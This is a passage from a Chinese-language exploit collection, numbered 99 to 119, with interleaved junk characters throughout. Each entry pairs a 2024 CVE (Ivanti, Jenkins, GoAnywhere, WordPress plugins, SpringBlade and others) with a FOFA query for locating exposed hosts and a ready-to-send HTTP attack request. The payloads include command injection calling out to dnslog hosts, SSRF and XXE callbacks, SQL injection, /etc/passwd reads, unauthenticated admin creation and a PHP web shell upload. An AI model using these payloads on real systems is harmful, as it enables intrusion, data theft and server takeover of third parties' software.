Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
w8 L) `7 F! c2 z: l8 ?9 N. jContent-Type: application/x-www-form-urlencoded; charset=UTF-8
# w6 ]+ {; k" v! h4 z6 l! ]X-Requested-With: XMLHttpRequest# ?" L% E- {4 }! V+ [+ S4 Z
3 V1 Q3 l* ?' y) aid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
: T8 V/ X" z5 n; e: ]" B; A k- f2 \$ }1 Y8 h+ ?1 _' d' {
, T' Q1 l/ Z- d/ i' Y' j
99. Ncast盈可视高清智能录播系统busiFacade RCE* q: H7 p* g7 v$ r
CVE-2024-0305
# {) F7 j: g9 K) GFOFA:app="Ncast-产品" && title=="高清智能录播系统"3 o* `; R z, \) F w
POST /classes/common/busiFacade.php HTTP/1.14 `* w8 y) t, K _2 r) [$ H+ w4 D
Host: 192.168.40.130:8080
5 J+ q7 b# S' r. f" xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' M: o# Z$ L/ A! xConnection: close6 G: k, R- U# z$ t
Content-Length: 154. `# I" k w2 s4 D- U) j
Accept: */*+ j i6 u1 q- n% e; e
Accept-Encoding: gzip, deflate
5 V+ W9 }# }$ v; H# yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* y/ x$ t5 @9 u& }0 Z: X: qContent-Type: application/x-www-form-urlencoded; charset=UTF-87 j* x+ O3 g' K$ i$ u) H3 O
X-Requested-With: XMLHttpRequest
4 X: R8 i1 e: n; b. E0 }% a: i
; m2 j! A, D7 G3 h8 H+ D/ S%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D1 I, c8 @% c. M- v5 s( D" O4 O7 k
: M! e X) O5 I( ?8 R5 I: k
/ L# i1 k& B; U2 Y- v! i& @
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 k0 C" M6 p' O! o# F* M C
CVE-2024-0352
* Y r' u7 f B5 b9 y3 `; CFOFA:icon_hash="874152924"
; t% H+ t8 j5 W) v$ G/ WPOST /api/file/formimage HTTP/1.14 W& T k: ?0 Y+ F
Host: 192.168.40.130
, i$ x/ Z# e( `User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.360 h/ w2 D3 ?# x
Connection: close* g- D" b* {) c# D
Content-Length: 201# Y6 J* j0 H3 s3 |; ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
4 k- a/ @, B# [( ~4 I- [9 Y2 NAccept-Encoding: gzip
& r8 M6 Z1 n4 v1 C: m( R
, e' T/ W8 p8 u! E _6 S4 C------WebKitFormBoundarygcflwtei
1 h1 w7 {) t1 d3 D4 F" iContent-Disposition: form-data; name="file";filename="IE4MGP.php"& }! {- M/ |/ R( f1 Q
Content-Type: application/x-php
: d$ U$ c# D: @3 O" Y( V0 b! f' Q& Y# }8 G4 B$ o$ I& S8 {
2ayyhRXiAsKXL8olvF5s4qqyI2O
. F4 v+ C7 x0 O" X/ `( Y" ^------WebKitFormBoundarygcflwtei--
. D: W% K* W1 Z. C5 }" |9 X8 ?. J- r4 t0 A$ `- [. H; \$ Q/ x
. W# e. x# J+ X- I
101. ivanti policy secure-22.6命令注入$ B" L$ d' O! `' L6 g
CVE-2024-21887
# o$ V1 N, B5 Z, ]4 BFOFA:body="welcome.cgi?p=logo"4 i) j8 b, k& W5 t4 N# e* L
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
# d# D3 A3 y5 S$ p) VHost: x.x.x.xx.x.x.x
: s$ A8 p8 J1 A6 O& r$ ]7 X: SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. c8 v6 ]3 D# F0 ]8 WConnection: close
8 c/ h) K8 d; }Accept-Encoding: gzip4 T+ P) J* r% ^! T( z' v! Z
( Z% w6 C0 y+ |! ]+ Q; G" E7 g+ t; l$ @2 L7 j
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; u$ x: y, Z n) S) P4 ]6 ICVE-2024-218932 ^; h+ t2 ?1 b( F' ?
FOFA:body="welcome.cgi?p=logo"
( s5 p7 u6 W" A, wPOST /dana-ws/saml20.ws HTTP/1.1
$ H6 p5 x6 S2 X$ o( `$ S4 bHost: x.x.x.x
% a% @* {' t1 ]- }0 L& I! mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 e% u% K& |& i
Connection: close
: Q; F# z% `7 p; U( S8 cContent-Length: 792
& J1 u) `7 w1 j8 x7 H, R( BAccept-Encoding: gzip
& c3 g2 H, g$ Z% u" }0 y: e( v4 I2 n* i
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>/ H \ v7 z7 o6 I I$ @% r: s9 f
# x3 ~8 s7 M% f2 P) k8 q5 z103. Ivanti Pulse Connect Secure VPN XXE6 O4 q! l+ d6 R5 [
CVE-2024-22024
4 j. T3 F/ Y# j% M. p* L8 P4 HFOFA:body="welcome.cgi?p=logo"% r5 m% ?0 E3 z3 r/ ]- p/ h
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
. L: K% {. L) M# R7 s! ZHost: 192.168.40.130:111
, N m6 O% q0 J1 ?: PUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36' m e! r ?- y) b v
Connection: close0 i% w- C+ ^3 }5 S
Content-Length: 204, T% K4 A! |" T3 b4 H
Content-Type: application/x-www-form-urlencoded; h0 `0 @+ T) l) |7 v* y4 _
Accept-Encoding: gzip
+ T5 C3 B( f* R7 f) Z
5 A! T+ k% h9 J- ZSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==5 h/ r+ C& p6 I
0 I! T3 f: H4 c" d
- X- I5 W9 f) R! H! X. ?/ E其中SAMLRequest的值是xml文件内容的base64值,xml文件如下$ ^% X }0 J! l5 f7 X4 j- _
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
5 L1 j# [- {' w5 ]4 Z
; h% [6 }( r- Y" n( O% X$ z; ~- `3 `) H# l. X8 v9 y# F1 ?
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
' {2 D; n) t/ l5 D' H+ a9 eCVE-2024-05699 g: T0 V) Z6 ]' Q+ x& \. [
FOFA:title="TOTOLINK"6 S6 n e' N( r
POST /cgi-bin/cstecgi.cgi HTTP/1.10 S0 ]. u5 r- x. N1 G! c+ l# u
Host:192.168.0.1
4 X ?5 C5 J) W0 G, }; R: R! b9 cContent-Length:413 u5 P2 C+ Q, X( g
Accept:application/json,text/javascript,*/*;q=0.018 p/ H9 q# P7 O0 u' X7 z. I
X-Requested-with: XMLHttpRequest7 K. H$ L& q& A& j0 V4 B+ j, R
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.361 U4 W3 v- ?9 Q& H$ u8 m
Content-Type: application/x-www-form-urlencoded:charset=UTF-8$ ]* f" ^% W% f" C1 r
Origin: http://192.168.0.1; P: d( Z& h% _) I; ?+ W) O
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
% }4 A! c6 t( S: m* GAccept-Encoding:gzip,deflate
0 _6 ~) D! _& J' p5 r- q9 k( lAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 |+ S& [# w$ [) R: ~Connection:close5 J8 s, G; W; A: t- j
, r% x* z7 w- o$ o; W( h' K! y
{! |6 f/ j/ K0 Y& Y4 Z
"topicurl":"getSysStatusCfg",
( ~9 a5 U& N7 r, R& q"token":""
+ A! |% C& _. u- E1 r3 o/ C1 H}
* U; p- |! w) {; ?
$ ~/ ^6 \: V* O. U9 A105. SpringBlade v3.2.0 export-user SQL 注入
& u5 \# t$ b( X k/ y$ C7 S8 vFOFA:body="https://bladex.vip"
7 o# y! _3 g# uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
8 ]/ X$ m3 Q% n# Y' r7 M4 L3 G& B4 |$ C9 j2 U) B) F+ k! T: B, S ]5 O
106. SpringBlade dict-biz/list SQL 注入
) D# H2 r9 }/ I8 kFOFA:body="Saber 将不能正常工作"
% r+ r& u" r! JGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.13 F4 F+ h% X; N
Host: your-ip
- E1 X. V1 z# d) vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 s2 p( e4 u; E h- Q' zBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
/ s, r X& Y! T+ E. ?Accept-Encoding: gzip, deflate) _; l, r" c# ~! C. b- H8 T
Accept-Language: zh-CN,zh;q=0.9
2 T. E% w |6 q! X9 X& gConnection: close
. K9 |2 _7 A- \7 h$ [' ]; B$ X4 j: _9 I* H, @" M
- s/ y4 m. \2 D3 V% M. Q
107. SpringBlade tenant/list SQL 注入
: O5 X k( j3 J q8 X U- LFOFA:body="https://bladex.vip"( k% H" Z* X9 c1 V
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! u! c8 _" w& KHost: your-ip
( p+ ~' d2 J% N7 l+ WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 H: [+ i. v. F* T9 T, qBlade-Auth:替换为自己的
9 N! j. U. E; p4 R6 T, U8 {# MConnection: close
% d. j0 A( ^" M6 I$ Y2 R6 N3 ^
' o9 W8 X- { [: `9 ~8 ~
/ C& ^3 e1 m5 y! S108. D-Tale 3.9.0 SSRF
% R6 w) D, m6 h dCVE-2024-21642
$ c( |+ L0 V+ ]* _$ j; X( O9 C* kFOFA:"dtale/static/images/favicon.png"( j9 D/ H7 P' k. d6 S' i5 J
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1 W' s9 P- I. P
Host: your-ip! b& K" R( m; M$ L: ^
Accept: application/json, text/plain, */*0 e) c7 J* {6 Q) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, l! K- f: m! x; f p' fAccept-Encoding: gzip, deflate
5 |3 j0 z' _5 z0 _/ w2 |% ~* ]* @. @' K! |Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ f& C5 L7 }6 w/ e7 k& r$ U& _
Connection: close
_8 r5 d! W6 g. w. [
) N8 G: ]/ J2 |4 L4 M W! M& f* @( R5 C$ d# A% L
109. Jenkins CLI 任意文件读取$ K% J" \' q6 Y
CVE-2024-238974 p7 [1 c$ i9 k- y5 k
FOFA:header="X-Jenkins"
. F& ~5 C1 i& p$ ~POST /cli?remoting=false HTTP/1.1 d4 V( y( ^: @& a" T. Z+ t
Host:1 R r8 p: z- m+ L5 \5 V" W
Content-type: application/octet-stream
3 a( A- X5 s* o9 P ^( CSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
( c6 }) B/ X! j3 }. D# e( r6 ISide: upload. i- q- Z# D* h' x/ G
Connection: keep-alive
$ b- U; {/ M% s: L; C+ |% lContent-Length: 163# X* b( A, p( c9 \
! P; {& i1 z9 rb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'% m, P) e8 z) z, I. Z* p9 f
* D2 a) ?3 a; R' w# P5 H: {. Z1 x/ W
/ b. w4 q/ j% v5 p% J* }POST /cli?remoting=false HTTP/1.17 i) V* |4 a. `" C5 o4 e
Host:
4 \& V% {+ T2 [! F& {Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92! B0 D# z! Q& ~% {2 l8 z3 }
download7 I5 c8 r9 {6 |7 c1 u' d& N
Content-Type: application/x-www-form-urlencoded
. m6 Z/ j* e& ]$ u4 a8 JContent-Length: 0
0 ^1 O5 o% z5 N1 |$ F7 S
& z2 i. |8 r9 G' G2 W+ u5 l, F" O, t/ I8 }+ H" c% D
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ \. X G7 c* J" fjava -jar jenkins-cli.jar help1 l( L. G. `1 y3 Z
[COMMAND]
7 Q ?+ R% w" N# w0 WLists all the available commands or a detailed description of single command. G. g( P+ @0 _2 S
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
) A* n0 Z* W; ?: g) _9 z' @! u ^& ?3 |/ q) Z/ t
0 p+ w1 z/ ~1 K& }110. Goanywhere MFT 未授权创建管理员
% h) K! x' s/ a* k: c0 { ]CVE-2024-02045 C' X! L5 [( m4 V* q
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
( s0 r' _( ^9 Z5 D iGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.11 `+ e. D% r6 _1 k" q
Host: 192.168.40.130:8000
5 [5 C [0 G9 W1 W& AUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 C9 \4 q6 M% L" `# F; H. r' M6 O
Connection: close
/ {2 J9 w4 |+ wAccept: */*" w" x4 J1 L' u
Accept-Language: en5 A9 e# U# J- }6 X& l% b, A
Accept-Encoding: gzip
4 }0 j1 H t- }# y
5 D' }( L; R/ r3 i
( |2 U8 o0 \, M111. WordPress Plugin HTML5 Video Player SQL注入: ^$ ] P: \* n$ b+ z- f) W
CVE-2024-10614 C, k# x4 x( V1 @4 b% d
FOFA:"wordpress" && body="html5-video-player"- B0 m+ W; Q% c8 I. B4 P" f# ~
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.17 V" |6 ]& P# {7 B0 G
Host: 192.168.40.130:112' H+ D. i; y0 T* |# \1 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ m/ W# \: b* Q8 L9 C* p7 `
Connection: close6 C" ^2 Z% r# H) u/ `- g1 w8 O3 Z8 u; J
Accept: */*
3 f5 h4 `5 ?! a4 I$ I- ^Accept-Language: en3 P& h6 Y* e2 ] `/ L
Accept-Encoding: gzip
* p! A8 ^. S- V8 R6 @; b6 R w2 V8 o# g' B' P8 L" U4 M
" n) T) ?3 _) E0 b7 e. R: }112. WordPress Plugin NotificationX SQL 注入5 Q6 p' w$ J# f& `
CVE-2024-1698
F; x' _( e4 p8 HFOFA:body="/wp-content/plugins/notificationx"
& ~4 A9 A5 V8 q2 G% W% TPOST /wp-json/notificationx/v1/analytics HTTP/1.1
) Z+ k4 \! @: \( x1 ]5 B* GHost: {{Hostname}}
% Y: { {$ A5 R2 n/ F* S2 vContent-Type: application/json5 `; B1 y; ?( V3 U3 B2 h5 p) E) r
7 N6 _- J% n# }/ _# B{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
7 [& r3 E! K+ k! r" S+ V" R' f$ q; z1 V' I
l: @+ [8 _: S5 U) a
113. WordPress Automatic 插件任意文件下载和SSRF
$ S: ]6 l* }# SCVE-2024-27954! J% H. @' I7 q! B0 O/ h7 [
FOFA:"/wp-content/plugins/wp-automatic"
5 Y% x& g0 N. a- h( W7 b2 TGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( o5 o r, }6 W" v: AHost: x.x.x.x
! a- R: ?: e8 L% S3 ^0 t& ~! x- dUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 N) ?: Z) @- G7 eConnection: close* U( N- P- J% I! y
Accept: */*' l: } z4 p3 u; v1 c: R% x3 N
Accept-Language: en6 a: F, E& p5 X; f' v( G! K+ B5 g
Accept-Encoding: gzip
) X: [; D. i; v {5 ?% q9 l: T) C$ v: b7 _0 V
8 |" w0 }( C$ ~& e
114. WordPress MasterStudy LMS插件 SQL注入5 p5 j0 @+ r+ y) G
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"& t% t; q5 Q: o' G. D8 V9 ]
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
. I9 q1 n7 L2 e- i/ U0 h, \Host: your-ip
+ O: F1 e# ]2 @9 p! I% @0 ?User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' y! a! H1 S g. m& N3 |Accept-Charset: utf-8
7 Q# P" ?; e5 P7 c5 F4 N# CAccept-Encoding: gzip, deflate2 H! K& G8 ]8 U j% P+ o4 J" Z
Connection: close4 u: h4 k9 f6 c8 N- B/ ?
8 M3 r. u7 L4 {0 e. n x
# I2 Y0 [ k* n1 e115. WordPress Bricks Builder <= 1.9.6 RCE
; {* l3 x r$ a* _, g! zCVE-2024-25600$ q- N3 F9 E+ d2 q6 ^+ p" q! V
FOFA: body="/wp-content/themes/bricks/"
% f o$ k& ?$ w第一步,获取网站的nonce值1 E4 w2 N0 I# M n0 M5 L' U
GET / HTTP/1.1
$ K) u/ }! T9 V( _Host: x.x.x.x
6 i+ u$ o' X. _* W! F, ZUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 g+ ~: {' M1 Y# @) r) v2 l SConnection: close
* z; V# [8 a( kAccept-Encoding: gzip U: N9 Y3 a6 `* z. B& g) D' Y
( H- z- E3 z& ]) g
! V. ]3 y7 B4 ~ i第二步替换nonce值,执行命令6 m# u! t) E( j: e
POST /wp-json/bricks/v1/render_element HTTP/1.1
2 d7 |3 x( p, F" eHost: x.x.x.x) v- d3 g- u" @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 l) F' i- A6 U jConnection: close1 R! Z+ a7 s$ M& a4 n
Content-Length: 356
# H; j4 Z/ i* Y6 v4 _0 h* v- fContent-Type: application/json
! ^$ s4 ~+ ~3 z5 ?. kAccept-Encoding: gzip+ U; b# P/ m/ u9 n, @7 t5 ~# `: P f
+ H g, k9 U9 W{- ?/ o( _6 k+ H) E# D& `0 E
"postId": "1",
3 I4 s W& B( a "nonce": "第一步获得的值",
+ c7 T# B/ \/ g/ E "element": {
! p" q( N4 H! j. d# m/ d "name": "container",
, p" Q7 F8 X9 e5 a; | "settings": {
2 V& h, Z' X y/ q) _5 L0 E# Y "hasLoop": "true",
( f7 _; t6 ?, V2 J "query": {
6 w' ^; ~, n2 k! y) \8 |5 D "useQueryEditor": true,
9 A) q9 O* h7 l "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
% x4 s2 _# e4 K4 Z "objectType": "post"5 ~$ v5 l& k3 d0 @7 e
}/ u. h% h- @) L& n9 x5 i
}
% m% X* p3 H; q7 t }5 j- O% l* Q9 @9 e7 Z
}% O9 g1 L2 o/ x; _# s; ]
- E2 A, _9 _, ?- u: C
4 W: _6 A) \7 E- R0 R2 c116. wordpress js-support-ticket文件上传5 s% T* R! U7 A# T$ K+ l/ G. g, [9 [
FOFA:body="wp-content/plugins/js-support-ticket"
/ D m" P/ d) {. \! aPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.12 J# K" Q" b6 @% |+ ^
Host:
- K5 b$ J" q3 \& |& P6 ^' x& SContent-Type: multipart/form-data; boundary=--------7670991715 u, q, s( L) F# V A" J
User-Agent: Mozilla/5.0
3 { `& b# O% A$ X
+ C1 _( P6 |% y {2 c----------767099171+ o ]) o" C+ A D. C D8 I
Content-Disposition: form-data; name="action"
; z d! f( {0 I/ Y3 v; L0 A/ cconfiguration_saveconfiguration
8 {# P; B0 B' @; E4 q. W) ~ v----------7670991717 C8 d, \8 f/ x9 F4 ]
Content-Disposition: form-data; name="form_request": @, v5 e! e: H
jssupportticket# @* z' h% }/ q9 x |8 l
----------7670991717 o6 f' A. m" y, O3 |/ k% I7 M% Q8 m0 A
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
) k; J( y+ e* v& L- v+ p0 dContent-Type: image/png
1 m4 ]$ C& U( ]1 E" s$ Y----------767099171--9 U1 c4 ~ D) i# @! ?/ t
9 o1 V, i E+ t" m
( g- m0 M. H+ c' t% K& [0 l& y& |# X117. WordPress LayerSlider插件SQL注入
' w5 G h4 @- e$ \3 P" ]: E' q: ]version:7.9.11 – 7.10.0- A) d0 n) c$ @1 P {# `6 J
FOFA:body="/wp-content/plugins/LayerSlider/"
1 Q( u- a8 O) v# @) O: u& o# DGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1, n! h1 C+ Q9 z1 T- d: A
Host: your-ip$ Q! Z1 Y7 p" t, f6 k7 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) R' A+ D' w* ]& k, K: u0 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% x' W3 J& Z1 [, k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 i J1 O5 m8 L' o2 ^
Accept-Encoding: gzip, deflate, br
* D# l7 `1 U- v2 ^9 ^Connection: close& y2 M& J* S+ E; N. K2 b- x
Upgrade-Insecure-Requests: 17 F; a% T& e$ K- v( ~( ^
5 {' R O8 s- T
7 e" @7 W B+ C! Z6 o118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% C" P' Q4 r+ @ PCVE-2024-0939
' K1 @/ E3 I: _7 ^8 F) S& ?FOFA:title="Smart管理平台" R# R# z; g, Q6 I) C
POST /Tool/uploadfile.php? HTTP/1.1
; n- z4 ]6 z- b& }! u# e, ~2 WHost: 192.168.40.130:84439 m; r z# z2 I! O% q
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
( q! A5 @3 H& n; D% c3 Y4 l* uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
* _; a0 F; E! N1 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; o' d4 n, s4 Q/ t3 m) M4 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: K$ ~8 j* `+ `6 w6 B1 O
Accept-Encoding: gzip, deflate
; ]) p; g% @1 B* kContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 l6 y* W! s1 `: o# e" RContent-Length: 405 u; M8 q9 f* A9 q
Origin: https://192.168.40.130:8443) k( ]3 B- K$ d3 X% I5 F* t
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
2 L% b( y. M" R+ Y, C0 uUpgrade-Insecure-Requests: 1- u K v! J$ U& |' o8 z
Sec-Fetch-Dest: document7 D- r4 F) E. J9 ^* F5 P' K, t7 e' b
Sec-Fetch-Mode: navigate
1 P! v. R: `- ZSec-Fetch-Site: same-origin, z* i' U9 r9 x% g) { E9 L( K
Sec-Fetch-User: ?1 C6 |9 Y; F) p. S
Te: trailers
1 y4 e. {# q# u1 \2 O8 U1 d0 dConnection: close
) T w/ U' V, q, P7 V9 e- f/ r8 `
% h. S9 X- |& X. v* Q5 s-----------------------------13979701222747646634037182887+ c' W1 P7 v) O9 t
Content-Disposition: form-data; name="file_upload"; filename="contents.php"3 A8 @) Q( S& d; t
Content-Type: application/octet-stream
- M! K8 M0 t) J5 S1 H0 s" [* M2 `, l5 v8 Y: F. a) k5 F: z, {
<?php
1 S+ Q t/ b* K; }# a- ]system($_POST["passwd"]);
$ K" z# K* z" t: ?! L9 ^( p) [?>. l; _- V# _3 i1 f8 H+ v6 j5 {
-----------------------------13979701222747646634037182887
' Z1 c/ d) A% [; NContent-Disposition: form-data; name="txt_path"
& ]5 P/ x" F- Y) p. A) i/ z; |% b1 X, X- R& e6 b* b1 ?$ j
/home/src.php" `5 u/ t5 |5 n& c+ c, ]
-----------------------------13979701222747646634037182887--
- A; p L: }, n5 `; g6 u8 ~( i8 u: E4 ]$ X- X! w: a) o
( M; L8 r: `' { F: C) a% e/ B
访问/home/src.php( C; U' P. v5 I) Q' R
( C2 `( M9 @$ a% v! U L: I5 U119. 北京百绰智能S20后台sysmanageajax.php sql注入, k3 I g4 W9 \3 _0 O4 N: G
CVE-2024-1254( A6 P8 p O6 ^- p' ?) ?
FOFA:title="Smart管理平台"6 G! T, \( v/ ^; t6 y9 @1 b; j
先登录进入系统,默认账号密码为admin/admin
* @: Y1 S, U7 Y/ f+ {4 O7 Z/ \) @3 YPOST /sysmanage/sysmanageajax.php HTTP/1.11 ], j# l4 n+ |1 S+ \0 p- H
Host: x.x.x.x5 \5 o" g/ S. B% P
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee, \# Y) v2 _8 M/ [$ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 D( g: P3 {7 w* {* T: T6 I" [+ }- S
Accept: */*8 U4 R. n$ K8 p' X/ i7 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: Y* ~' I: n/ WAccept-Encoding: gzip, deflate. Y( k6 E+ T* S8 a
Content-Type: application/x-www-form-urlencoded;- [+ L( s' S- h2 ~7 M' ]
Content-Length: 1099 o) V% f0 C3 m& K5 X# @
Origin: https://58.18.133.60:8443/ p4 T7 {+ L* x: M7 T
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
$ q- N' I# U" r* f4 F% [Sec-Fetch-Dest: empty
8 J$ F/ k/ \; o! X$ J7 OSec-Fetch-Mode: cors+ D ^( _) _9 h$ ~1 r
Sec-Fetch-Site: same-origin
: [1 K; D6 z8 i4 g' y& t3 cX-Forwarded-For: 1.1.1.1
4 `& f2 v1 ^* Y6 d' CX-Originating-Ip: 1.1.1.1: E( H) `/ U+ `+ H) ~
X-Remote-Ip: 1.1.1.1
